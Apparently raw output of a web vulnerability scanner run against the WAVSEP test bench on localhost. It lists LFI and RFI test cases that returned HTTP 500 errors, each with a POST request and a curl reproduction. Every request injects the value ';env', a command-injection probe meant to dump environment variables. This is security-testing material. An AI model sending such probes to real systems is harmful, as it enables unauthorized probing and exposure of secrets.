Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
